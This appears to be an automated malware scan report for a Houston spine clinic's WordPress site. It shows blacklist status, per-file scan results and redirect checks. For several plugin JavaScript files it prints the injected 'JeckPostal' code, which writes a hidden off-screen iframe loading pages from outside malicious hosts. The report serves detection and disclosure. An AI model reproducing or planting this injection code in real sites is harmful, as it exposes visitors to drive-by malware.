Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=houstonspinedoc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://houstonspinedoc.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.houstonspinedoc.com/ | 200 OK Content-Length: 42007 Content-Type: text/html | clean |
http://www.houstonspinedoc.com/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.houstonspinedoc.com/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.houstonspinedoc.com/wp-content/plugins/LayerSlider/static/js/layerslider.kreaturamedia.jquery.js | 200 OK Content-Length: 57335 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="http://faskarao.arawat.com/welcometo15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132">& Antivirus reports:
| ||
http://www.houstonspinedoc.com/wp-content/plugins/LayerSlider/static/js/greensock.js | 200 OK Content-Length: 52925 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="http://faskarao.arawat.com/welcometo15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132">& Decoded script: (function(e){"use strict";var t=e.GreenSockGlobals||e;if(!t.TweenLite){var n,r,i,s,o,u=function(e){var n,r=e.split("."),i=t;for(n=0;r.length>n;n++)i[r[n]]=i=i[r[n]]||{};return i},a=u("com.greensock"),f=1e-10,l=[].slice,c=function(){},h=function(){var e=Object.prototype.toString,t=e.call([]);return function(n){return n instanceof Array||"object"==typeof n&&!!n.push&&e.call(n)===t}}(),p={},d=function(n,r,i,s){this.sc=p[n]?p[n].sc:[],p[n]=this,this.gsClass=null,this.func=i;v } /*** called setTimeout with function (e) { C = N(), f.time = (C - l) / 1000; var t, s = f.time - a; (!n || s > 0 || e === true) && (f.frame++, a += s + (s >= u ? 0.004 : u - s), t = true), e !== true && (i = r(p)), t && f.dispatchEvent("tick"); }, 66 */ <iframe src="http://faskarao.arawat.com/welcometo15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://www.houstonspinedoc.com/wp-content/plugins/LayerSlider/static/js/layerslider.transitions.js | 200 OK Content-Length: 21725 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="http://faskarao.arawat.com/welcometo15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132">& Decoded script: var layerSliderTransitions={t2d:[{name:"Sliding from right",rows:1,cols:1,tile:{delay:0,sequence:"forward"},transition:{type:"slide",easing:"easeInOutQuad",duration:1e3,direction:"left"}},{name:"Sliding from left",rows:1,cols:1,tile:{delay:0,sequence:"forward"},transition:{type:"slide",easing:"easeInOutQuad",duration:1e3,direction:"right"}},{name:"Sliding from bottom",rows:1,cols:1,tile:{delay:0,sequence:"forward"},transition:{type:"slide",easing:"easeInOutQuad",duration:1e3,direction:"top" <iframe src="http://faskarao.arawat.com/welcometo15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://www.houstonspinedoc.com/wp-content/plugins/buddypress/bp-templates/bp-legacy/js/buddypress.js | 200 OK Content-Length: 64080 Content-Type: application/javascript | clean |
http://www.houstonspinedoc.com/wp-content/plugins/buddypress/bp-core/js/confirm.min.js | 200 OK Content-Length: 143 Content-Type: application/javascript | clean |
http://www.houstonspinedoc.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?rev=4.1.4 | 200 OK Content-Length: 78032 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="http://faskarao.cefalometriaonline.com.ar/tomorow15.html" style="position:absolute;left: -700px;top: -700px;" height="132" wid })(jQuery) Decoded script: function (t) { S = A(), h.time = (S - _) / 1000; var e, n = h.time - l; (!i || n > 0 || t === true) && (h.frame++, l += n + (n >= o ? 0.004 : o - n), e = true), t !== true && (r = s(f)), e && h.dispatchEvent("tick"); } /*** called setTimeout with function (t) { S = A(), h.time = (S - _) / 1000; var e, n = h.time - l; (!i || n > 0 || t === true) && (h.frame++, l += n + (n S = A(), h.time = (S - _) / 1000; var e, n = h.time - l; (!i || n > 0 || t === true) && (h.frame++, l += n + (n >= o ? 0.004 : o - n), e = true), t !== true && (r = s(f)), e && h.dispatchEvent("tick"); }, 51 */ <iframe src="http://faskarao.cefalometriaonline.com.ar/tomorow15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://www.houstonspinedoc.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.1.4 | 200 OK Content-Length: 81862 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="http://faskarao.cefalometriaonline.com.ar/tomorow15.html" style="position:absolute;left: -700px;top: -700px;" height="132" wid Antivirus reports:
| ||
http://www.houstonspinedoc.com//cdnjs.cloudflare.com/ajax/libs/modernizr/2.6.2/modernizr.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 14 Sep 2014 11:31:41 GMT Pragma: no-cache Location: http://www.houstonspinedoc.com/cdnjs.cloudflare.com/ajax/libs/modernizr/2.6.2/modernizr.min.js/ Server: Apache mod_fcgid/2.3.10-dev Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.houstonspinedoc.com/xmlrpc.php X-Powered-By: PHP/5.4.31 | clean |
http://www.houstonspinedoc.com/cdnjs.cloudflare.com/ajax/libs/modernizr/2.6.2/modernizr.min.js/ | 404 Not Found Content-Length: 27261 Content-Type: text/html | clean |
http://www.houstonspinedoc.com/wp-content/plugins/designthemes-core-features/shortcodes/js/inview.js | 200 OK Content-Length: 2674 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="http://faskarao.hellfirestunguns.com/jumping15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="1 } } else if (scrolltop < (top + height)) { if (!inview) { $el.data('inview', true); $el.trigger('inview', [ true ]); } } }); } }); $(function () { $(window).scroll(); }); })(jQuery); Decoded script: <iframe src="http://faskarao.hellfirestunguns.com/jumping15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://www.houstonspinedoc.com/wp-content/plugins/designthemes-core-features/shortcodes/js/jquery.tabs.min.js | 200 OK Content-Length: 5501 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="http://faskarao.hellfirestunguns.com/jumping15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="1 Decoded script: <iframe src="http://faskarao.hellfirestunguns.com/jumping15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://www.houstonspinedoc.com/wp-content/plugins/designthemes-core-features/shortcodes/js/jquery.viewport.js | 200 OK Content-Length: 2549 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="http://faskarao.hellfirestunguns.com/jumping15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="1 return $.abovethetop(a, {threshold : 0}); }, "left-of-screen": function(a, i, m) { return $.leftofscreen(a, {threshold : 0}); }, "right-of-screen": function(a, i, m) { return $.rightofscreen(a, {threshold : 0}); }, "in-viewport": function(a, i, m) { return $.inviewport(a, {threshold : 0}); } }); })(jQuery); Decoded script: <iframe src="http://faskarao.hellfirestunguns.com/jumping15.html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://www.houstonspinedoc.com/wp-content/plugins/designthemes-core-features/shortcodes/js/jquery.carouFredSel-6.2.1-packed.js | 200 OK Content-Length: 55418 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: houstonspinedoc.com
Result:
GET / HTTP/1.1
Host: houstonspinedoc.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: houstonspinedoc.com
Referer: http://www.google.com/search?q=houstonspinedoc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: houstonspinedoc.com
Referer: http://www.google.com/search?q=houstonspinedoc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.